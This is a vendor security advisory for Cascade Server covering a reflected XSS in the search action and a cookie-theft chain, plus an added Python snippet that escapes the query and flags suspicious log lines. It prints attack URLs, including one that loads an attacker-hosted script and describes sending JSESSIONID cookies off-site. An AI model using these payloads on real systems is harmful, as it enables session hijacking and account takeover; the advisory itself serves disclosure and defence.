Security Update 6-29-2009

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions

Severity: Moderate

Hannon Hill rates the severity of these vulnerabilities as Moderate. The vulnerabilities allow an attacker to make victims execute arbitrary JavaScript, gain access to Cascade, or elevate his/her privileges; but they require the attacker to manipulate victims using social engineering tactics. If the attacker already had Cascade credentials, he/she could embed a malicious link in frequently visited content to more easily manipulate victims into navigating to it.

Risk Assessment

The underlying vulnerability is that user input is returned verbatim in the browser when the search query supplied by the user is not parsable.

XSS Vulnerability

An attacker without access to Cascade could manipulate victims using social engineering tactics into executing arbitrary JavaScript when navigating to the Cascade search action.
An example link would be:

http://domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Ealert('hacked')%3C/script%3E&mode=basic

An attacker with access to Cascade could embed a link to the Cascade search action containing arbitrary JavaScript in a prominent place within Cascade page content to more easily manipulate victims into navigating to the link.

CSRF Vulnerability

The CSRF vulnerability is an extension of the XSS vulnerability, except that it also requires the attacker to have access to a server under the same parent domain as the one where Cascade is running. For example, if Cascade is hosted at cascade.hannonhill.com, the attacker would also need access to a sub-domain like intranet.hannonhill.com.
The steps to exploit this vulnerability are as follows:
1. Create XSS like:

http://cascade.domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Edocument.domain=domain.com%3C/script%3E%3Cscript%20src=http://subdomain.domain.com/attacker/x.js%20/%3E&mode=basic

Here the document domain of the page is reset to the shared parent domain. This allows the attacker to bypass the browser's same-origin policy and the security restrictions that would normally prevent a script from loading from a different server.
2. Social engineer a victim to visit the above XSS link, or if the attacker already had access to Cascade, embed this link in the content of a frequently visited page.
3. When the user clicks the link, the malicious script loads and sends the victim's document.cookie (which includes the JSESSIONID) to an off-site server.
4. Attacker visits https://cascade.domain.com:port/login.act to have the system set a valid cookie on the attacker's browser.
5. Attacker replaces his valid JSESSIONID with the one retrieved via XSS and successfully assumes the identity of the victim.

Vulnerability

The XSS and CSRF vulnerabilities exist in all Cascade Server versions prior to Cascade 5.7.5 in the 5 series, and prior to 6.0.3 in the 6 series.

Fix

The fix is for Cascade to properly escape or hide user input when displaying the error message in the search results page.

This issue has been fixed in Cascade 5.7.5, 6.0.3, and later. There are no patch versions available for Cascade versions 5.5.x or earlier. We recommend an upgrade to Cascade 5.7.x or later.
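The following is an added illustration, not Cascade's own code: it decodes the quickQuery parameter from the example link above, contrasts the verbatim reflection the advisory describes with the escaped rendering the fix calls for, and flags search requests carrying markup in constructed sample log lines. The host name cascade.example, the error-message wording and the log format are assumptions.

```python
import html
from urllib.parse import urlsplit, parse_qs

def quick_query(url):
    """Return the decoded quickQuery parameter of a searchsubmit.act URL, or None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/searchsubmit.act"):
        return None
    values = parse_qs(parts.query).get("quickQuery")
    return values[0] if values else None

def render_error_vulnerable(query):
    """'Before' behaviour described in the advisory: the unparsable query is reflected verbatim."""
    return "<p>Could not parse search query: " + query + "</p>"

def render_error_fixed(query):
    """'After' behaviour: HTML-escape the query so the browser shows it as text, not markup."""
    return "<p>Could not parse search query: " + html.escape(query, quote=True) + "</p>"

def suspicious_searches(log_lines):
    """Defender check: flag searchsubmit.act requests whose decoded quickQuery contains markup."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 2:
            continue
        # fields[1] is the request target; the host is a constructed placeholder.
        query = quick_query("http://cascade.example" + fields[1])
        if query is not None and ("<" in query or ">" in query):
            hits.append(query)
    return hits

# Constructed sample access-log request lines (not taken from a real Cascade server).
SAMPLE_LOG = [
    "GET /searchsubmit.act?quickQuery=annual+report&mode=basic HTTP/1.1",
    "GET /searchsubmit.act?quickQuery=%22%3Cscript%3Ealert('hacked')%3C/script%3E&mode=basic HTTP/1.1",
    "GET /dashboard.act HTTP/1.1",
]

if __name__ == "__main__":
    for q in suspicious_searches(SAMPLE_LOG):
        print("reflected verbatim :", render_error_vulnerable(q))
        print("escaped by the fix :", render_error_fixed(q))
```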